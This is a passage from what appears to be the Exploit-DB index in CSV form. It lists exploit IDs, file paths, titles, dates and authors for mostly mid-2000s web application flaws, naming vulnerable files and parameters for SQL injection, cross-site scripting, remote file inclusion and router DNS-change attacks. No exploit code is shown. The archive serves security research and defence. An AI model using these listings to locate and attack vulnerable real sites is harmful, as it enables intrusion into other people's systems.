Disclosure",2013-10-22,"Justin Oberdorf",hardware,webapps,80 -29133,exploits/asp/webapps/29133.txt,"Rapid Classified 3.1 - 'viewad.asp' SQL Injection",2006-11-20,"laurent gaffie",asp,webapps, -29134,exploits/asp/webapps/29134.txt,"Rapid Classified 3.1 - 'view_print.asp' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps, -29135,exploits/asp/webapps/29135.txt,"Rapid Classified 3.1 - 'search.asp' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps, -29136,exploits/asp/webapps/29136.txt,"Rapid Classified 3.1 - 'reply.asp' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps, -29137,exploits/asp/webapps/29137.txt,"Rapid Classified 3.1 - 'advsearch.asp' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps, -29157,exploits/php/webapps/29157.txt,"Seditio 1.10 - 'Users.Profile.Inc.php' SQL Injection",2006-11-21,"Mustafa Can Bjorn",php,webapps, -29158,exploits/php/webapps/29158.txt,"CuteNews 1.4.5 - 'show_news.php' Cross-Site Scripting",2006-11-21,"Alireza Hassani",php,webapps, -29159,exploits/php/webapps/29159.txt,"CuteNews 1.4.5 - 'rss_title' Cross-Site Scripting",2006-11-21,"Alireza Hassani",php,webapps, -29141,exploits/asp/webapps/29141.txt,"The Classified Ad System 3.0 - 'default.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-11-20,"laurent gaffie",asp,webapps, -29142,exploits/asp/webapps/29142.txt,"Klf-Realty 2.0 - 'search_listing.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",asp,webapps, -29143,exploits/asp/webapps/29143.txt,"Klf-Realty 2.0 - 'detail.asp?property_id' SQL Injection",2006-11-20,"laurent gaffie",asp,webapps, -29145,exploits/php/webapps/29145.txt,"Wabbit PHP Gallery 0.9 - 'Dir' Directory Traversal",2006-11-20,the_Edit0r,php,webapps, -29162,exploits/php/webapps/29162.txt,"My Little Weblog 2006.11.21 - 'Weblog.php' Cross-Site Scripting",2006-11-21,the_Edit0r,php,webapps, -29217,exploits/php/webapps/29217.txt,"CuteNews 1.3.6 - 'result' Cross-Site Scripting",2006-12-02,Detefix,php,webapps, -29218,exploits/php/webapps/29218.txt,"PHPNews 1.3 - 'Link_Temp.php' Cross-Site Scripting",2006-12-02,Detefix,php,webapps, -29219,exploits/asp/webapps/29219.txt,"DUdownload 1.0/1.1 - 'detail.asp' Multiple SQL Injections",2006-12-02,"Aria-Security Team",asp,webapps, -29220,exploits/asp/webapps/29220.html,"Metyus Okul Yonetim 1.0 - 'Sistemi Uye_giris_islem.asp' SQL Injection",2006-12-04,ShaFuck31,asp,webapps, -29165,exploits/php/webapps/29165.txt,"PMOS Help Desk 2.3 - 'ticketview.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-22,SwEET-DeViL,php,webapps, -29166,exploits/php/webapps/29166.txt,"PMOS Help Desk 2.3 - 'ticket.php?email' Cross-Site Scripting",2006-11-22,SwEET-DeViL,php,webapps, -29992,exploits/php/webapps/29992.txt,"Campsite 2.6.1 - 'SubscriptionSection.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29993,exploits/php/webapps/29993.txt,"Campsite 2.6.1 - 'SystemPref.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29216,exploits/asp/webapps/29216.html,"Aspee Ziyaretci Defteri - 'giris.asp' Multiple Field SQL Injections",2006-12-01,ShaFuq31,asp,webapps, -29173,exploits/php/webapps/29173.txt,"Active PHP BookMarks 1.1.2 - Multiple Remote File Inclusions",2006-11-23,ThE-LoRd-Of-CrAcKiNg,php,webapps, -29174,exploits/asp/webapps/29174.txt,"MidiCart ASP - 'Item_Show.asp?ID2006quant' SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps, -29175,exploits/php/webapps/29175.txt,"Simple PHP Gallery 1.1 - 'System SP_Index.php' Cross-Site Scripting",2006-11-24,"Al7ejaz Hacker",php,webapps, -29176,exploits/asp/webapps/29176.txt,"ASP ListPics 5.0 - 'Listpics.asp' SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps, -29177,exploits/php/webapps/29177.txt,"MMGallery 1.55 - 'Thumbs.php' Cross-Site Scripting",2006-11-24,"Al7ejaz Hacker",php,webapps, -29178,exploits/asp/webapps/29178.txt,"Fixit iDms Pro Image Gallery - 'filelist.asp' Multiple SQL Injections",2006-11-24,"Aria-Security Team",asp,webapps, -29179,exploits/asp/webapps/29179.txt,"Fixit iDms Pro Image Gallery - 'showfile.asp?fid' SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps, -29180,exploits/asp/webapps/29180.txt,"SIAP CMS - 'login.asp' SQL Injection",2006-11-25,nagazakig74,asp,webapps, -29181,exploits/php/webapps/29181.txt,"cPanel 11 Beta - Multiple Cross-Site Scripting Vulnerabilities",2006-11-25,"Aria-Security Team",php,webapps, -29182,exploits/php/webapps/29182.txt,"cPanel WebHost Manager 3.1 - 'dochangeemail?email' Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps, -29183,exploits/php/webapps/29183.txt,"cPanel WebHost Manager 3.1 - 'addon_configsupport.cgi?supporturl' Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps, -29184,exploits/php/webapps/29184.txt,"cPanel WebHost Manager 3.1 - 'editpkg?pkg' Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps, -29185,exploits/php/webapps/29185.txt,"cPanel WebHost Manager 3.1 - 'domts2?domain' Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps, -29186,exploits/php/webapps/29186.txt,"cPanel WebHost Manager 3.1 - 'editzone?domain' Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps, -29187,exploits/php/webapps/29187.txt,"cPanel WebHost Manager 3.1 - 'dofeaturemanager?feature' Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps, -29188,exploits/php/webapps/29188.txt,"cPanel WebHost Manager 3.1 - 'park?ndomain' Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps, -29189,exploits/asp/webapps/29189.txt,"fipsShop - Multiple SQL Injections",2006-11-25,"Aria-Security Team",asp,webapps, -29191,exploits/asp/webapps/29191.txt,"ClickContact - 'default.asp' Multiple SQL Injections",2006-11-27,"Aria-Security Team",asp,webapps, -29192,exploits/asp/webapps/29192.txt,"Clickblog - 'Displaycalendar.asp' SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps, -29193,exploits/asp/webapps/29193.txt,"Click Gallery - Multiple Input Validation Vulnerabilities",2006-11-27,"Aria-Security Team",asp,webapps, -29195,exploits/asp/webapps/29195.txt,"uPhotoGallery 1.1 - 'Slideshow.asp?ci' SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps, -29196,exploits/asp/webapps/29196.txt,"uPhotoGallery 1.1 - 'thumbnails.asp?ci' SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps, -29197,exploits/asp/webapps/29197.txt,"Evolve Shopping Cart - 'products.asp' SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps, -29198,exploits/php/webapps/29198.txt,"b2evolution 1.8.2/1.9 - '_404_not_found.page.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,"lotto fischer",php,webapps, -29199,exploits/php/webapps/29199.txt,"b2evolution 1.8.2/1.9 - '_410_stats_gone.page.php?app_name' Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps, -40371,exploits/cgi/webapps/40371.sh,"Tenda ADSL2/2+ Modem 963281TAN - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 -29200,exploits/php/webapps/29200.txt,"b2evolution 1.8.2/1.9 - '_referer_spam.page.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,"lotto fischer",php,webapps, -29202,exploits/php/webapps/29202.txt,"Seditio1.10 / Land Down 8.0 Under - 'polls.php' SQL Injection",2006-11-30,ajann,php,webapps, -29203,exploits/php/webapps/29203.php,"Woltlab Burning Board 2.3.x - 'register.php' Cross-Site Scripting",2006-11-30,blueshisha,php,webapps, -29205,exploits/php/webapps/29205.txt,"Invision Gallery 2.0.7 - 'index.php?IMG' SQL Injection",2006-12-01,infection,php,webapps, -29262,exploits/hardware/webapps/29262.pl,"Pirelli Discus DRG A125g - Password Disclosure",2013-10-28,"Sebastián Magof",hardware,webapps, -29207,exploits/php/webapps/29207.txt,"DZCP (deV!L_z Clanportal) 1.3.6 - 'Show' SQL Injection",2006-12-01,"Tim Weber",php,webapps, -29231,exploits/asp/webapps/29231.txt,"Dol Storye - 'Dettaglio.asp' Multiple SQL Injections",2006-12-06,WarGame,asp,webapps, -29232,exploits/php/webapps/29232.txt,"Link CMS - 'navigacija.php?IDMeniGlavni' SQL Injection",2006-11-18,"Ivan Markovic",php,webapps, -29233,exploits/php/webapps/29233.txt,"Link CMS - 'prikazInformacije.php?IDStranicaPodaci' SQL Injection",2006-11-18,"Ivan Markovic",php,webapps, -29223,exploits/php/webapps/29223.txt,"Inside Systems Mail 2.0 - 'error.php' Cross-Site Scripting",2006-12-04,"Vicente Aguilera Diaz",php,webapps, -29224,exploits/asp/webapps/29224.txt,"UApplication Uguestbook 1.0 - 'index.asp' SQL Injection",2006-12-04,"Aria-Security Team",asp,webapps, -29225,exploits/php/webapps/29225.txt,"ac4p Mobile - 'up.php?Taaa' Cross-Site Scripting",2006-12-04,SwEET-DeViL,php,webapps, -29226,exploits/php/webapps/29226.txt,"ac4p Mobile - 'polls.php' Multiple Cross-Site Scripting Vulnerabilities (2)",2006-12-04,SwEET-DeViL,php,webapps, -29227,exploits/asp/webapps/29227.txt,"Vt-Forum Lite 1.3 - 'vf_info.asp?StrMes' Cross-Site Scripting",2006-12-04,St@rExT,asp,webapps, -29228,exploits/asp/webapps/29228.txt,"Vt-Forum Lite 1.3 - 'vf_newtopic.asp' IFRAME Element Cross-Site Scripting",2006-12-04,St@rExT,asp,webapps, -29328,exploits/php/webapps/29328.txt,"ImpressPages CMS 3.6 - Arbitrary File Deletion",2013-11-01,LiquidWorm,php,webapps, -29237,exploits/php/webapps/29237.txt,"cPanel 11 BoxTrapper - Manage.HTML Cross-Site Scripting",2006-12-08,"Aria-Security Team",php,webapps, -29238,exploits/php/webapps/29238.txt,"cPanel Web Hosting Manager 3.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-12-08,"Aria-Security Team",php,webapps, -29240,exploits/asp/webapps/29240.txt,"Cilem Haber Free Edition - 'hata.asp?hata' Cross-Site Scripting",2006-12-08,ShaFuck31,asp,webapps, -29241,exploits/asp/webapps/29241.txt,"MaviPortal - 'Arama.asp' Cross-Site Scripting",2006-12-09,St@rExT,asp,webapps, -29242,exploits/php/webapps/29242.txt,"Messageriescripthp 2.0 - 'lire-avis.php?aa' SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps, -29243,exploits/php/webapps/29243.txt,"Messageriescripthp 2.0 - 'existepseudo.php?pseudo' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps, -29244,exploits/php/webapps/29244.txt,"Messageriescripthp 2.0 - 'existeemail.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps, -29245,exploits/php/webapps/29245.txt,"Messageriescripthp 2.0 - '/Contact/contact.php' Multiple Cross-Site Scripting Vulnerabilities",2006-12-09,Mr_KaLiMaN,php,webapps, -29246,exploits/php/webapps/29246.txt,"AnnonceScriptHP 2.0 - '/admin/admin_membre/fiche_membre.php?idmembre' SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps, -29247,exploits/php/webapps/29247.txt,"AnnonceScriptHP 2.0 - 'erreurinscription.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps, -29248,exploits/php/webapps/29248.txt,"AnnonceScriptHP 2.0 - '/Templates/admin.dwt.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps, -29249,exploits/php/webapps/29249.txt,"AnnonceScriptHP 2.0 - '/Templates/commun.dwt.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps, -29250,exploits/php/webapps/29250.txt,"AnnonceScriptHP 2.0 - 'membre.dwt.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps, -29251,exploits/php/webapps/29251.txt,"AnnonceScriptHP 2.0 - '/admin/admin_config/Aide.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps, -29252,exploits/php/webapps/29252.txt,"AnnonceScriptHP 2.0 - 'email.php?id' SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps, -29253,exploits/php/webapps/29253.txt,"AnnonceScriptHP 2.0 - 'voirannonce.php?no' SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps, -29254,exploits/php/webapps/29254.txt,"KDPics 1.11/1.16 - 'index.php3?categories' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps, -29255,exploits/php/webapps/29255.txt,"KDPics 1.11/1.16 - 'galeries.inc.php3?categories' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps, -29258,exploits/php/webapps/29258.txt,"PHP RSS Reader 2010 - SQL Injection",2013-10-28,"mishal abdullah",php,webapps, -29264,exploits/php/webapps/29264.txt,"Onpub CMS 1.4/1.5 - Multiple SQL Injections",2013-10-28,Vulnerability-Lab,php,webapps, -29265,exploits/php/webapps/29265.txt,"ILIAS eLearning CMS 4.3.4 < 4.4 - Persistent Cross-Site Scripting",2013-10-29,Vulnerability-Lab,php,webapps, -29266,exploits/hardware/webapps/29266.txt,"Stem Innovation - 'IZON' Hard-Coded Credentials",2013-10-29,"Mark Stanislav",hardware,webapps, -29267,exploits/php/webapps/29267.txt,"ProNews 1.5 - '/admin/change.php' Multiple Cross-Site Scripting Vulnerabilities",2006-12-09,Mr_KaLiMaN,php,webapps, -29268,exploits/php/webapps/29268.txt,"ProNews 1.5 - 'lire-avis.php?aa' SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps, -29269,exploits/php/webapps/29269.txt,"ProNews 1.5 - 'lire-avis.php?aa' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps, -29270,exploits/php/webapps/29270.txt,"MXBB Profile Control Panel 0.91c - Module Remote File Inclusion",2006-12-09,bd0rk,php,webapps, -29271,exploits/asp/webapps/29271.txt,"AppIntellect SpotLight CRM - 'login.asp' SQL Injection",2006-12-09,ajann,asp,webapps, -29272,exploits/php/webapps/29272.txt,"CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting",2006-12-11,Nicokiller,php,webapps, -29280,exploits/php/webapps/29280.txt,"GTX CMS 2013 Optima - SQL Injection",2013-10-29,Vulnerability-Lab,php,webapps, -29282,exploits/php/webapps/29282.txt,"GenesisTrader 1.0 - 'form.php' Arbitrary File Source Disclosure",2006-12-14,Mr_KaLiMaN,php,webapps, -29283,exploits/php/webapps/29283.txt,"GenesisTrader 1.0 - 'form.php' Multiple Cross-Site Scripting Vulnerabilities",2006-12-14,Mr_KaLiMaN,php,webapps, -29284,exploits/php/webapps/29284.txt,"Moodle 1.5/1.6 - '/mod/forum/discuss.php?navtail' Cross-Site Scripting",2006-12-14,"Jose Miguel Yanez Venegas",php,webapps, -29288,exploits/asp/webapps/29288.txt,"Omniture SiteCatalyst - Multiple Cross-Site Scripting Vulnerabilities",2006-12-16,"Hackers Center Security",asp,webapps, -29289,exploits/php/webapps/29289.php,"eXtreme-fusion 4.02 - 'Fusion_Forum_View.php' Local File Inclusion",2006-12-16,Kacper,php,webapps, -29293,exploits/asp/webapps/29293.txt,"Contra Haber Sistemi 1.0 - 'Haber.asp' SQL Injection",2006-12-16,ShaFuck31,asp,webapps, -29294,exploits/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 - 'Shout.php' HTML Injection",2006-12-18,IMHOT3B,php,webapps, -29298,exploits/php/webapps/29298.txt,"osTicket 1.2/1.3 Support Cards - 'view.php' Cross-Site Scripting",2006-12-19,"Hacker CooL",php,webapps, -29299,exploits/php/webapps/29299.txt,"Mini Web Shop 2.1.c - 'view.php?Viewcategory.php' Cross-Site Scripting",2006-12-19,Linux_Drox,php,webapps, -29300,exploits/php/webapps/29300.txt,"Typo3 3.7/3.8/4.0 - 'Class.TX_RTEHTMLArea_PI1.php' Multiple Remote Command Execution Vulnerabilities",2006-12-20,"D. Fabian",php,webapps, -29301,exploits/jsp/webapps/29301.txt,"Oracle Portal 9.0.2 - Calendar.jsp Multiple HTTP Response Splitting Vulnerabilities",2006-12-20,"putosoft softputo",jsp,webapps, -29303,exploits/php/webapps/29303.txt,"PHPBuilder 0.0.2 - 'HTM2PHP.php' Directory Traversal",2006-11-08,"the master",php,webapps, -29304,exploits/php/webapps/29304.txt,"Calacode @Mail Webmail 4.51 - Filtering Engine HTML Injection",2006-12-20,"Philippe C. Caturegli",php,webapps, -29292,exploits/windows/webapps/29292.txt,"XAMPP for Windows 1.8.2 - Blind SQL Injection",2013-10-29,"Sebastián Magof",windows,webapps, -29306,exploits/php/webapps/29306.txt,"A-Blog 1.0 - Cross-Site Scripting",2006-12-22,Fukumori,php,webapps, -29308,exploits/php/webapps/29308.txt,"Oracle Portal 9i/10g - Container_Tabs.jsp Cross-Site Scripting",2006-12-22,"putosoft softputo",php,webapps, -29311,exploits/php/webapps/29311.txt,"Xt-News 0.1 - 'add_comment.php?id_news' Cross-Site Scripting",2006-12-22,Mr_KaLiMaN,php,webapps, -29312,exploits/hardware/webapps/29312.txt,"Unicorn Router WB-3300NR - Cross-Site Request Forgery (Factory Reset/DNS Change)",2013-10-30,absane,hardware,webapps, -29313,exploits/php/webapps/29313.txt,"Xt-News 0.1 - 'show_news.php?id_news' Cross-Site Scripting",2006-12-22,Mr_KaLiMaN,php,webapps, -29314,exploits/php/webapps/29314.txt,"Xt-News 0.1 - 'show_news.php?id_news' SQL Injection",2006-12-22,Mr_KaLiMaN,php,webapps, -29994,exploits/php/webapps/29994.txt,"Campsite 2.6.1 - 'template.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29995,exploits/php/webapps/29995.txt,"Campsite 2.6.1 - 'TimeUnit.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps, -29318,exploits/php/webapps/29318.txt,"ImpressPages CMS 3.6 - Multiple Cross-Site Scripting / SQL Injection Vulnerabilities",2013-10-31,LiquidWorm,php,webapps, -29326,exploits/php/webapps/29326.txt,"Opsview pre 4.4.1 - Blind SQL Injection",2013-10-31,"J. Oquendo",php,webapps,80 -30207,exploits/asp/webapps/30207.txt,"FuseTalk 4.0 - 'blog/include/common/comfinish.cfm?FTVAR_SCRIPTRUN' Cross-Site Scripting",2007-06-20,"Ivan Almuina",asp,webapps, -30203,exploits/asp/webapps/30203.txt,"Comersus Cart 7.0.7 - 'comersus_optReviewReadExec.asp?id' SQL Injection",2007-06-20,Doz,asp,webapps, -30204,exploits/asp/webapps/30204.txt,"Comersus Cart 7.0.7 - 'comersus_customerAuthenticateForm.asp' redirectUrl Cross-Site Scripting",2007-06-20,Doz,asp,webapps, -29330,exploits/php/webapps/29330.txt,"WordPress Theme Switchblade 1.3 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",php,webapps, -29331,exploits/php/webapps/29331.txt,"ImpressPages CMS 3.6 - 'manage()' Remote Code Execution",2013-11-01,LiquidWorm,php,webapps, -29332,exploits/php/webapps/29332.txt,"WordPress Theme Think Responsive 1.0 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",php,webapps, -29333,exploits/asp/webapps/29333.txt,"Efkan Forum 1.0 - 'Grup' SQL Injection",2006-12-22,ShaFuq31,asp,webapps, -40370,exploits/cgi/webapps/40370.sh,"PLANET VDR-300NU ADSL Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 -29334,exploits/cfm/webapps/29334.txt,"Future Internet - 'index.cfm' Multiple SQL Injections",2006-12-23,Linux_Drox,cfm,webapps, -29335,exploits/cfm/webapps/29335.txt,"Future Internet - 'index.cfm?categoryId' Cross-Site Scripting",2006-12-23,Linux_Drox,cfm,webapps, -29336,exploits/asp/webapps/29336.txt,"Chatwm 1.0 - 'SelGruFra.asp' SQL Injection",2006-12-24,ShaFuq31,asp,webapps, -29337,exploits/php/webapps/29337.txt,"TimberWolf 1.2.2 - 'shownews.php' Cross-Site Scripting",2006-12-24,CorryL,php,webapps, -29338,exploits/php/webapps/29338.txt,"vBulletin 3.5.x/3.6.x - SWF Script Injection",2006-12-25,"Ashraf Morad",php,webapps, -29342,exploits/php/webapps/29342.txt,"Luckybot 3 - 'DIR' Multiple Remote File Inclusions",2006-12-26,Red_Casper,php,webapps, -29343,exploits/php/webapps/29343.txt,"phpCMS 1.1.7 - 'counter.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps, -29344,exploits/php/webapps/29344.txt,"phpCMS 1.1.7 - 'parser.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps, -29345,exploits/php/webapps/29345.txt,"phpCMS 1.1.7 - 'class.parser_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps, -29346,exploits/php/webapps/29346.txt,"phpCMS 1.1.7 - 'class.session_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps, -29347,exploits/php/webapps/29347.txt,"phpCMS 1.1.7 - 'class.edit_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps, -29348,exploits/php/webapps/29348.txt,"phpCMS 1.1.7 - 'class.http_indexer_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps, -29349,exploits/php/webapps/29349.txt,"phpCMS 1.1.7 - 'class.cache_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps, -29350,exploits/php/webapps/29350.txt,"phpCMS 1.1.7 - 'class.search_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps, -29351,exploits/php/webapps/29351.txt,"phpCMS 1.1.7 - 'class.lib_indexer_universal_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps, -29352,exploits/php/webapps/29352.txt,"phpCMS 1.1.7 - 'class.layout_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps, -29375,exploits/php/webapps/29375.txt,"Simplog 0.9.3 - 'archive.php' SQL Injection",2007-01-02,"Javor Ninov",php,webapps, -29376,exploits/php/webapps/29376.txt,"VCard Pro - 'gbrowse.php' Cross-Site Scripting",2007-01-02,exexp,php,webapps, -29354,exploits/php/webapps/29354.txt,"pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting",2013-11-01,Vulnerability-Lab,php,webapps, -29474,exploits/php/webapps/29474.txt,"Scriptme SmE 1.21 - File Mailer Login SQL Injection",2007-01-16,CorryL,php,webapps, -29356,exploits/php/webapps/29356.txt,"WordPress 1.x/2.0.x - 'template.php' HTML Injection",2006-12-27,"David Kierznowski",php,webapps, -29357,exploits/asp/webapps/29357.txt,"Hosting Controller 7C - 'FolderManager.aspx' Directory Traversal",2006-12-27,KAPDA,asp,webapps, -29358,exploits/asp/webapps/29358.txt,"DMXReady Secure Login Manager 1.0 - 'login.asp?sent' SQL Injection",2006-12-27,Doz,asp,webapps, -29359,exploits/asp/webapps/29359.txt,"DMXReady Secure Login Manager 1.0 - 'content.asp?sent' SQL Injection",2006-12-27,Doz,asp,webapps, -29360,exploits/asp/webapps/29360.txt,"DMXReady Secure Login Manager 1.0 - 'members.asp?sent' SQL Injection",2006-12-27,Doz,asp,webapps, -29361,exploits/asp/webapps/29361.txt,"DMXReady Secure Login Manager 1.0 - '/applications/SecureLoginManager/inc_secureloginmanager.asp?sent' SQL Injection",2006-12-27,Doz,asp,webapps, -29363,exploits/php/webapps/29363.txt,"PHP iCalendar 1.1/2.x - 'day.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps, -29364,exploits/php/webapps/29364.txt,"PHP iCalendar 1.1/2.x - 'month.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps, -29365,exploits/php/webapps/29365.txt,"PHP iCalendar 1.1/2.x - 'year.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps, -29366,exploits/php/webapps/29366.txt,"PHP iCalendar 1.1/2.x - 'week.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps, -29367,exploits/php/webapps/29367.txt,"PHP iCalendar 1.1/2.x - 'search.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps, -29368,exploits/php/webapps/29368.txt,"PHP iCalendar 1.1/2.x - 'getdate' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps, -29369,exploits/php/webapps/29369.txt,"PHP iCalendar 1.1/2.x - 'print.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps, -29370,exploits/php/webapps/29370.txt,"PHP iCalendar 1.1/2.x - 'preferences.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps, -29372,exploits/php/webapps/29372.txt,"Mobilelib Gold - Multiple Cross-Site Scripting Vulnerabilities",2006-12-29,"viP HaCKEr",php,webapps, -29373,exploits/asp/webapps/29373.txt,"Spooky 2.7 - 'login/register.asp' SQL Injection",2006-12-30,Doz,asp,webapps, -29377,exploits/php/webapps/29377.txt,"AShop Deluxe 4.5 - 'catalogue.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps, -29378,exploits/php/webapps/29378.txt,"AShop Deluxe 4.5 - 'basket.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps, -29379,exploits/php/webapps/29379.txt,"AShop Deluxe 4.5 - 'search.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps, -29380,exploits/php/webapps/29380.txt,"AShop Deluxe 4.5 - 'shipping.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps, -29381,exploits/php/webapps/29381.txt,"AShop Deluxe 4.5 - 'editcatalogue.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps, -29382,exploits/php/webapps/29382.txt,"AShop Deluxe 4.5 - 'salesadmin.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps, -29384,exploits/php/webapps/29384.txt,"RI Blog 1.3 - 'search.asp' Cross-Site Scripting",2007-01-05,ShaFuck31,php,webapps, -29385,exploits/asp/webapps/29385.txt,"Kolayindir Download - 'down.asp' SQL Injection",2007-01-05,ShaFuck31,asp,webapps, -29476,exploits/php/webapps/29476.txt,"Microweber 0.905 - Error-Based SQL Injection",2013-11-07,Zy0d0x,php,webapps, -29389,exploits/multiple/webapps/29389.txt,"Practico 13.9 - Multiple Vulnerabilities",2013-11-03,LiquidWorm,multiple,webapps, -29390,exploits/cgi/webapps/29390.txt,"EditTag 1.2 - 'edittag.cgi?file' Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps, -29391,exploits/cgi/webapps/29391.txt,"EditTag 1.2 - 'edittag.pl?file' Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps, -29392,exploits/cgi/webapps/29392.txt,"EditTag 1.2 - 'edittag_mp.cgi?file' Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps, -29393,exploits/cgi/webapps/29393.txt,"EditTag 1.2 - 'edittag_mp.pl?file' Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps, -29394,exploits/cgi/webapps/29394.txt,"EditTag 1.2 - 'mkpw_mp.cgi?plain' Cross-Site Scripting",2007-01-05,NetJackal,cgi,webapps, -29395,exploits/cgi/webapps/29395.txt,"EditTag 1.2 - 'mkpw.pl?plain' Cross-Site Scripting",2007-01-05,NetJackal,cgi,webapps, -29396,exploits/cgi/webapps/29396.txt,"EditTag 1.2 - 'mkpw.cgi?plain' Cross-Site Scripting",2007-01-05,NetJackal,cgi,webapps, -29397,exploits/php/webapps/29397.php,"Coppermine Photo Gallery 1.4.11 - SQL Injection",2007-01-05,DarkFig,php,webapps, -29398,exploits/asp/webapps/29398.txt,"Shopstorenow E-Commerce Shopping Cart - 'Orange.asp' SQL Injection",2007-01-06,IbnuSina,asp,webapps, -29401,exploits/asp/webapps/29401.txt,"CreateAuction - 'Cats.asp' SQL Injection",2007-01-08,IbnuSina,asp,webapps, -29404,exploits/php/webapps/29404.txt,"MediaWiki 1.x - 'AJAX index.php' Cross-Site Scripting",2007-01-09,"Moshe Ben-Abu",php,webapps, -29405,exploits/php/webapps/29405.txt,"PHPKit 1.6.1 - 'comment.php' SQL Injection",2007-01-09,yorn,php,webapps, -29407,exploits/php/webapps/29407.txt,"Magic Photo Storage Website - '/admin/admin_password.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29408,exploits/php/webapps/29408.txt,"Magic Photo Storage Website - '/admin/add_welcome_text.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29409,exploits/php/webapps/29409.txt,"Magic Photo Storage Website - '/admin/admin_email.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29410,exploits/php/webapps/29410.txt,"Magic Photo Storage Website - '/admin/add_templates.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29411,exploits/php/webapps/29411.txt,"Magic Photo Storage Website - '/admin/admin_paypal_email.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29412,exploits/php/webapps/29412.txt,"Magic Photo Storage Website - '/admin/approve_member.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29413,exploits/php/webapps/29413.txt,"Magic Photo Storage Website - '/admin/delete_member.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29414,exploits/php/webapps/29414.txt,"Magic Photo 